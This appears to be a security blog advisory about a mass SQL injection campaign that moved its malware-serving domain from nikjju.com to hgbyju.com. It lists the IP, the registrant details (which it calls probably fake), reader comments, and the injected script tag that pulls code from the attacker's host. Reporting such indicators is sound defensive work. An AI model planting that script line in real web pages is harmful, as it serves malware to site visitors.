We posted a few days ago about a Mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju.com malware.
However, since the last two days, the attackers switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:
<script src = http://hgbyju.com/r.php <</script>
This domain name was registered just a few days ago (April 17) by James Northone jamesnorthone@hotmailbox.com, same name/email used on nikjju.com and many other domains from similar malware campaigns (probably fake):
Registrant Contact:
JamesNorthone
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us
So they have been at this for a while with no sign at stopping.
Luke Leal
John Castro
Ben Martin
Denis Sinegubko
Daniel Cid
3 comments
hi have you got a solution to stop this injection ? thx
Hi, Today i have found another domain ‘Uhjiku. com’ …
The details can be found here:
http://www.ehackingnews.com/2012/05/uhjiku-com-injection-nikjju-sql.html
Comments are closed.